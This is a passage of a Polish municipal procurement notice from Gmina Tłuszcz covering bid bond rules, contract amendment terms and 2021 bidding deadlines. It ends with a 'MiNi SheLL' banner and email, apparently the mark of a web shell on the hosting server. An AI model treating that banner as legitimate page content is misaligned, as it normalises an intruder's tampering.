0000 (słownie: czterdzieści tysięcy złotych 00/100). <br/>2. Wadium wnosi się przed upływem terminu składania ofert.<br/>3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu; <br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>4. Wadium w formie pieniądza należy wnieść przelewem na konto w Banku PKO BP S.A nr rachunku 59 1020 1026 0000 1902 0260 3587 z dopiskiem „Wadium – nr postępowania”.<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>5. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie p.z.p.;<br/>2) z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>3) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem, iż pierwszym dniem związania ofertą jest dzień składania ofert);<br/>5) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>6) beneficjentem poręczenia lub gwarancji jest: Gmina Tłuszcz;<br/>7) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 p.z.p.), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>6. Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 p.z.p. zostanie odrzucona.<br/>7. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 p.z.p. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający dopuszcza zmianę umowy w formie aneksu, w sytuacji zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego. Zmiana wymaga zgłoszenia w formie pisemnej informacji stanowiącej podstawę do wprowadzenia zmian. Zmiana ta może spowodować wydłużenie terminu wykonania prac i nie spowoduje zmiany wynagrodzenia Wykonawcy. Inicjatorem tej zmiany może być Zamawiający lub Wykonawca.<br/>2.	Zamawiający dopuszcza zmianę kierownika budowy oraz innych osób biorących po stronie Wykonawcy udział w realizacji przedmiotu umowy, w sytuacji zdarzeń losowych oraz w przypadku niewywiązywania się z pełnionych obowiązków. Inicjatorem zmiany może być Zamawiający i Wykonawca. Zmiana musi nastąpić na osoby, które spełniają warunki określone w SWZ. Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 3 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Zmiany te nie wpłyną na termin wykonania prac i nie spowodują zmiany wynagrodzenia Wykonawcy. <br/>3.	Zamawiający, po wyrażeniu zgody, dopuszcza zmianę umowy w formie aneksu w przypadku: <br/>1)	wystąpienia nieprzewidzianych warunków i zjawisk atmosferycznych (kataklizmy), <br/>2)	wystąpienia siły wyższej np.: trąby powietrznej, pożaru, powodzi,<br/>3)	wstrzymania budowy przez właściwy organ z przyczyn nie zawinionych przez Wykonawcę robót budowlanych, np.: dokonanie odkrywki archeologicznej, odkrycie niewybuchu, szczątków ludzkich itp., <br/>4)	wystąpienia innych nieprzewidzianych i uzasadnionych okoliczności, <br/>5)	wystąpienia następstw działań administracyjnych (np. konieczności uzyskania wyroku sądowego lub innego orzeczenia sądu lub organu, którego konieczności nie przewidziano na etapie zawarcia umowy), <br/>6)	konieczności przerwania robót z uwagi na wystąpienie obiektywnych przyczyn technicznych, <br/>7)	wstrzymania prac budowlanych przez właściwy organ z przyczyn niezawinionych przez Wykonawcę, <br/>8)	wystąpienia innych okoliczności nie powstałych z winy Wykonawcy, <br/>9)	konieczności wykonania robót dodatkowych, których wykonanie jest niezbędne dla prawidłowego wykonania oraz zakończenia przedmiotu zamówienia.<br/>4.	Inicjatorem zmiany może być Wykonawca lub Zamawiający. Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 4 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Zmiana ta może spowodować zmianę terminu wykonania prac i zmianę wynagrodzenia Wykonawcy. <br/>5.	Zamawiający dopuszcza zmianę jakości lub innych parametrów charakterystycznych dla danego elementu robót budowlanych lub zmianę technologii ze względu na zmianę postępu technologicznego (np. wycofanie produktu z rynku) w uzgodnieniu z Zamawiającym i dla niego korzystnych, w sytuacjach nie zawinionych przez Wykonawcę. Zmiany te nie wpłyną na termin wykonania prac i nie spowodują zmiany wynagrodzenia Wykonawcy.<br/>6.	Zamawiający dopuszcza zmianę podwykonawcy. Zmiana ta nie wpłynie na termin wykonania prac i nie spowoduje zmiany wynagrodzenia Wykonawcy. Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 4 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Inicjatorem zmiany może być Wykonawca. <br/>7.	Dopuszcza się zmiany w umowie dotyczące wynagrodzenia Wykonawcy jeżeli zachodzi potrzeba wykonania prac nie ujętych w projekcie lub też w sytuacji zmiany projektu, jeżeli potrzeba wykonania prac lub zmian w projekcie zostanie potwierdzona przez inspektora nadzoru w protokole konieczności. Zamawiający przewiduje w tym zakresie możliwość udzielenia zamówienia na roboty dodatkowe zgodnie z art. 455 ustawy Prawo zamówień publicznych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-11 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Składanie ofert następuje za pośrednictwem platformy zakupowej dostępnej pod adresem internetowym http://tluszcz.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-11 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-09</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> cd. zmian umowy 8.	Dopuszcza się zmianę wynagrodzenia Wykonawcy w następujących okolicznościach: <br/>1)	w przypadku zmiany stawki podatku od towarów i usług oraz podatku akcyzowego,<br/>2)	w przypadku zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie ustawy z dnia 10 października 2002r. o minimalnym wynagrodzeniu za pracę, <br/>3)	w przypadku zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki na ubezpieczenia społeczne lub zdrowotne,<br/>4)	w przypadku zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (Dz. U. poz. 2215 oraz z 2019 r. poz. 1074 i 1572)<br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę. <br/>9.	W przypadku wystąpienia okoliczności wskazanych w ust. 8 Wykonawca składa pisemny wniosek o zmianę wysokości wynagrodzenia. W przypadkach wymienionych w ust. 8 pkt 2-4 Wniosek powinien dotyczyć tylko osób bezpośrednio realizujących umowę. Wniosek powinien zawierać wyczerpujące uzasadnienie faktyczne i prawne oraz dokładne wyliczenie kwoty wynagrodzenia Wykonawcy po wystąpieniu wymienionych w ust. 8 okoliczności, w szczególności Wykonawca będzie zobowiązany wykazać związek pomiędzy wnioskowaną kwotą podwyższenia wynagrodzenia a wpływem zmiany podatku VAT, minimalnego wynagrodzenia za pracę albo minimalnej stawki godzinowej lub wpływem zmiany zasad, o których mowa w ust. 8 pkt 3 i 4 na kalkulację ceny ofertowej. Wniosek powinien obejmować jedynie te dodatkowe koszty realizacji zamówienia, które Wykonawca obowiązkowo ponosi w związku z okolicznościami wymienionymi w ust. 8. Nie będą akceptowane koszty, które nie są konieczne w celu ich dostosowania do wymienionych w ust. 8 okoliczności.<br/>10.	W przypadku potwierdzenia przez Zamawiającego zasadności wprowadzenia zmian do umowy, zmiana wysokości wynagrodzenia obowiązywać będzie od dnia wejścia w życie zmian, o których mowa w art. 436 pkt 4 lit b tiret 2-4 ustawy Prawo zamówień publicznych. <br/>11.	W przypadku wystąpienia okoliczności wskazanych w ust. 8 pkt 1 zmiana wynagrodzenia brutto będzie dotyczyć faktur wystawionych od dnia wejścia w życie przepisów zmieniających wartość stawki podatku VAT od towarów i usług.

Creat By MiNi SheLL
Email: jattceo@gmail.com